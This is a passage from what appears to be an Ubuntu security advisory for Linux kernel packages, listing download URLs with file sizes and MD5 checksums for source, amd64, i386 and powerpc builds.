http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.32.orig.tar.gz\n      Size/MD5: 81900940 4b1f6f6fac43a23e783079db589fc7e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-qcm-msm/linux-qcm-msm_2.6.31-802.4.diff.gz\n      Size/MD5:  4275510 2e55ad3f665eba2ccfa99804c5f61941\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-qcm-msm/linux-qcm-msm_2.6.31-802.4.dsc\n      Size/MD5:     2162 a0268c009b0452ce1d6bbfaba3ef0537\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-qcm-msm/linux-qcm-msm_2.6.31.orig.tar.gz\n      Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ti-omap/linux-ti-omap_2.6.33-501.7.diff.gz\n      Size/MD5:  3434570 c246b6f07ee762ee5c6c13b8d064507d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ti-omap/linux-ti-omap_2.6.33-501.7.dsc\n      Size/MD5:     1442 43cfcac6c98558e0dd45b6a13873c5eb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ti-omap/linux-ti-omap_2.6.33.orig.tar.gz\n      Size/MD5: 87197318 83dfcb85de817d9b63ee31937118c9c3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.32-22.35.diff.gz\n      Size/MD5:  4621518 c2fc8cc8caf3e8d8908bb4732a60d33c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.32-22.35.dsc\n      Size/MD5:     5568 b7b30fce01964ef809d3395f29c0f22d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.32.orig.tar.gz\n      Size/MD5: 81900940 4b1f6f6fac43a23e783079db589fc7e2\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.32-306.11_all.deb\n      Size/MD5:  6391790 9934fb97782458b5a5a108364b86420b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.32_2.6.32-306.11_all.deb\n      Size/MD5: 68063660 bb66d042a1242106996c48d03bd54046\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.32-306_2.6.32-306.11_all.deb\n      Size/MD5: 10003726 932c5faf79a155d5370beb510831362d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.32-22.35_all.deb\n      Size/MD5:  6391904 582ebf59bf8ab2d33b7c7801647f64ac\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22_2.6.32-22.35_all.deb\n      Size/MD5:  9867826 a112051f276dfe638c98adfbe2cda80a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.32_2.6.32-22.35_all.deb\n      Size/MD5: 65820192 c149de16c0b96afb2c8c98d4a5884d95\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-common_2.6.32-22.35_all.deb\n      Size/MD5:    60636 0bd150c7fc457da6d1fdcab7f45b9f11\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.32-306-ec2_2.6.32-306.11_amd64.deb\n      Size/MD5:   644868 cd3691870ce135309d16a78adbf93987\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.32-306-ec2_2.6.32-306.11_amd64.deb\n      Size/MD5: 19834952 257f5cfe67bd2e727bb8b304d3301993\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   237840 9a34fe2a5b057dc2b1daf0fd30850943\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    16524 eb35584a630e3a85766ea5ce0c4f6365\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    50052 eefea187a93724843bd127552830ac1b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    46262 57bf21e6ee6fb7cc5f9ef8fc40d08d6a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    51764 cd3379b942e04b3200473484370fb876\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    95192 402d06156f91240b619e96f22dd75ea3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    38660 85256686a4855537b2e8214f51a8581d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   538882 c1d7290a91896acc094f0a26407dece2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   133544 e75341c9805a52943d5720f1dfa720bd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    98914 e5fb0f13ddbd94ffe79ccdff3cf0f7d3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   320120 a00104d9f50d0d65c86aaf575b35e11c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:  4449968 5583c3906b7ffa87fe64c0117f946fa0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-generic_2.6.32-22.35_amd64.deb\n      Size/MD5:   744950 e2bf6a508794318db16cc6e30009d1ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-preempt_2.6.32-22.35_amd64.deb\n      Size/MD5:   746984 73361899082062e6b6907a58b65e13dc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-server_2.6.32-22.35_amd64.deb\n      Size/MD5:   746996 e5509ecca0fcfc8894c390bf92c93bc7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-generic_2.6.32-22.35_amd64.deb\n      Size/MD5: 30865592 448c8ed0e90302de8cc67d3c26ab4bec\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-preempt_2.6.32-22.35_amd64.deb\n      Size/MD5: 31127336 95a46fb5b7b2a1490fb7f8dffc796665\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-server_2.6.32-22.35_amd64.deb\n      Size/MD5: 30941912 0da9825e4c58d53ada9c259bb30b0a1d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-virtual_2.6.32-22.35_amd64.deb\n      Size/MD5: 12400736 63c330cd8f3013a2352ba69b55e091de\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.32-22.35_amd64.deb\n      Size/MD5:   771326 cbcf12d3846a08c4aad270f94c2967ad\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_amd64.deb\n      Size/MD5:   188410 8ab096d110797b29ce0e55513d2cfc9d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   179004 82935c201d651a8f2540b4509246dcc6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   266266 62a5d101bf2df6cc46e07a6ac5c754f8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    32456 f2cf533f43928805184e2e8445851764\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   330624 5d9e4a16d27efd75fe48f737d97709a7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:  2379272 bc901048af3e41a52a1b6fdbcb07fd82\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   163568 7a0da6ae3ce1dc89eb492b721114b041\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   245610 f228d86967c3c2f54793d67c3723df98\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   179798 dc4938e5607f0ab8fac24b68b6cdc30c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    39240 9fe5999bb37261ec1eafaef688af802c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   150324 f8cbef960228695ddf3f44279d9f309d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    76634 d9ef1f8ece226b70bac378b406b2fd72\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    22998 d4281699ad107f572718380f6f8854e2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:     9744 c22fbc8081b2f5cb5ab4699ab799efe0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    41032 86840a3b7f62ba90fdd545ed0909a200\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   103692 0e4189f9ea0d93fa5bdcd0a59fca46ee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:  1445188 1a3aefd74d49cac4a6c27f1df74e85fb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    40680 cff9f81e2e76f3bd9f2b2bfb92a8b1ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    15420 e261cc78944c65be7ae4cf01206ed46a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    53056 a44b3cac618e304b5ec27fa1644ac6b4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:   134924 ac50fc239193b640db9fe2c8dfd8e25f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    16746 8ac42a73c7facd9dd40bbd9dae43f1ea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-22-generic-di_2.6.32-22.35_amd64.udeb\n      Size/MD5:    22362 df95e4cf43ff61bfdcd1b9c3260779cd\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.32-306-ec2_2.6.32-306.11_i386.deb\n      Size/MD5:   621024 7b07a270215d6dd4e8d3893d74f08f8c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.32-306-ec2_2.6.32-306.11_i386.deb\n      Size/MD5: 19197386 b48d278dbd72f606b0bdee27cdfa461c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   207168 04f695e7bd431c95896ba7343d704c24\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   212536 d34379185e1c36eb47b732fb8ff1db33\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    34260 fac3ca7d3353a02c170c663a86817ab2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    34560 de0b20e1fb34c4a605482afe4ccd383f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    48026 b1b6503c8d2c69dba29c0e7212210553\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    48042 b74910fe0c9fe6dedc55d616531e8e9c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    43630 9c5855cb9e72e959a86bec59ca889a63\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    43654 5086f6f21c2eec63ee2dbae90e9006c4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    47824 35033954fd15422a784c6a1502d0ed05\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    47892 8a1e2129f4c4199e97f50979db7a7303\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    90440 749f5096fa443cebaa5819e7dedfd15d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    90780 e01f7cac074601d43a87d2efed48f5f9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    34638 8fa9caf412924705ae079ecbf4581859\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    34696 2f8fe16bbc0d3cc5a858c93f92e2ef65\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   535026 9d4cbabe440b3b35dca15cab907c977a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   534774 9813309ab4c7c9cf97364bca8df2309e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   130862 d65ebfcedc44f8a18a2a6dbc728a0808\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   130886 a7b9ec1632f19a9bc991858b8522691f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    91586 dff28b0c21dbfd697f8f7cd153017f62\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    91658 78956e99f332397bfcdc0d5ce6466ee6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   305268 20691a772242ecf4b853df1228b49b32\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   306204 6fb638d788f6ab1fee67c09fb0054274\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:  4301526 9a01c667449a37d1daf3d1f01c0cbaed\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:  4430826 fabbe2cbce7e887e0da33b0ebf01c7c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-386_2.6.32-22.35_i386.deb\n      Size/MD5:   729628 a0c53de17e95532c4c748dcb8c3f8a82\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-generic-pae_2.6.32-22.35_i386.deb\n      Size/MD5:   729524 e1e5eef7b13c61550d8ba319ae41a0aa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-22-generic_2.6.32-22.35_i386.deb\n      Size/MD5:   727666 bec8fde6ea2236863fa2da253cc891d6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-386_2.6.32-22.35_i386.deb\n      Size/MD5: 30921264 fe4dbe8391e9be16a08bde9f0d7a663a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-generic-pae_2.6.32-22.35_i386.deb\n      Size/MD5: 31020332 1ebd2f8932847138aafb7ed3e6957c58\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-generic_2.6.32-22.35_i386.deb\n      Size/MD5: 30929116 e207e190177733b86d036e0bacd9279a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.32-22-virtual_2.6.32-22.35_i386.deb\n      Size/MD5: 11937042 f75a9af8e6b0b1395b8c85e675b25d3c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.32-22.35_i386.deb\n      Size/MD5:   771288 818266f8a6808cc542c9245db590c703\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-tools-2.6.32-22_2.6.32-22.35_i386.deb\n      Size/MD5:   180486 579bada2cd54987719ae06e8269c176e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   182664 1ff8ed599a987d8a016a359412511d72\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   182810 4711fddd17faed9cb7de1ec1d71fc53e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   249278 23dab95ffbc4b230ddc7f1c797a3bcb9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   251962 fe10f470f29620ce2f54260684821bb8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    33842 b9dbe86e294a6f732c08965009591921\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    33864 eb80dbd858a2a1154de4670b63c33059\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   310380 2382b6c171c0aa238ddb3df4a4ad8dfe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   310412 253a9da96c5fa7f006a3311187163630\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:  2493630 c992b5a7a0c300009c416305f2e6ce01\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:  2511312 975b0287bf52ab17a32b804add8de75e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   147230 fbd3a7d9e0065703b8528bc452384621\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   147306 5039e5f46fed6adcbc78430a7f5136d3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   228658 7ec7d48f3e42055a07e20e6e3e3142c7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   228734 aa7e8172c565ca8124678fa9c9444a41\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   165954 3e748608ea7b38c34be69c1ff91ad2a8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   166012 f708e9e4ad641fa6275a5a3e535b06ef\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    36362 143f93890826df238056a1e5f43bc07a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    36486 13949aaa8ad32338fff3c56ad0780c9a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   156928 9888f0f521ed580da0aa3eee88db9ee9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   157200 14718c7817980def8cefe742fc25f4b8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    90206 9b4f0a5ae4ecc56928710578948e8aa8\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    91098 72d98fe1c957a6533d0e92bcd9df126f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    48114 c156299aa317a60124657975ba0422cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    48158 41a0c6cdd72641fc6327c91e2a41303e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:     9106 b3c84333d67154196fe492330ec937f4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:     9112 c6d1478d99deba24df0f1abc7a1c6360\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    37450 d41485700623523bc62b122a67f57f37\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    37472 8c553307ba6fec0874a4767f46eac97c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    93834 49462cab3b38d4e445456e6496f688e7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    94402 a0ab7d68e42751978e478e46b39c8b58\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:  1555960 02d24e085fcacdc34b770d8e4b3e60c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:  1506776 e05a832ffa4bb240518968c28eb05fd2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    37966 d5bd6c357df20158f33dc5d8b898786e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    37970 b1917a566671571351108712ea8b7cea\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    15568 0094f62a06418771e1b7ce988e5229dc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/squashfs-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    15580 5f1e986aa2e88d63d62322ec85e8da17\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    50002 d7a47201c272480d804ab92e91a9c00f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    50056 08be19a737d5c6b1b99b21c072e28d75\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   123832 091e7733c12a45745381b4fe35d3640b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:   124268 2e5ad0b6c7b80907a9927bb37446aa06\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    15488 0afa442071262b64ba4fbfe594b44306\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:     5710 b999ccf838edc897b8874914e3f25148\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-22-generic-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    20788 7140a98dd26b05e5278d938a02b9af4f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux/vlan-modules-2.6.32-22-generic-pae-di_2.6.32-22.35_i386.udeb\n      Size/MD5:    20798 a2cab82a0956e6ec96375cd9f6e23a29\n\n  powerpc architecture (Apple Macintosh G3/G4/G5):\n\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   340852 5448ca0d59837472e8062a7758249b05\n    http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:   281626 20cdb99682c1f387eedd2dfdccc39c0b\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    60558 30fa795c08458a313f3a04c3ac06b833\n    http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.32-22-powerpc64-smp-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    68708 65c5e7b743e6e041e55ab080726e6326\n    http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.32-22-powerpc-di_2.6.32-22.35_powerpc.udeb\n      Size/MD5:    48390 9d549e434d1f43ca803c400337537735\n    